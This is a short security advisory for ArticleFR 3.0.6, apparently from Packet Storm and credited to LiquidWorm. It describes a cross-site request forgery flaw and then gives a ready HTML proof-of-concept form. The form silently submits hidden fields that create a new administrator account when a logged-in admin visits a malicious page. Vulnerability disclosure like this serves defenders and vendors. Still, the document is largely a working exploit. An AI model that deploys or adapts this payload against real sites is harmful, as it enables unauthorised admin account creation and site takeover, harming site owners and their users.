ArticleFR 3.0.6 Cross Site Request Forgery

Type packetstorm
Reporter LiquidWorm
Modified 2015-07-14T00:00:00


ArticleFR 3.0.6 CSRF Add Admin Exploit  
Vendor: Free Reprintables  
Product web page:  
Affected version: 3.0.6  
Summary: A lightweight fully featured content (article / video)  
management system. Comes with a pluginable and multiple module  
framework system.  
Desc: The application allows users to perform certain actions  
via HTTP requests without performing any validity checks to  
verify the requests. This can be exploited to perform certain  
actions with administrative privileges if a logged-in user  
visits a malicious web site.  
Tested on: nginx/1.6.2  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2015-5248  
Advisory URL:  
<form action="" method="POST">  
<input type="hidden" name="username" value="thricer" />  
<input type="hidden" name="name" value="The_Hacker" />  
<input type="hidden" name="password" value="s3cr3t" />  
<input type="hidden" name="email" value="" />  
<input type="hidden" name="website" value="" />  
<input type="hidden" name="blog" value="zsl" />  
<input type="hidden" name="membership" value="admin" />  
<input type="hidden" name="isactive" value="active" />  
<input type="hidden" name="submit" value="Create" />  
<input type="submit" value="Request" />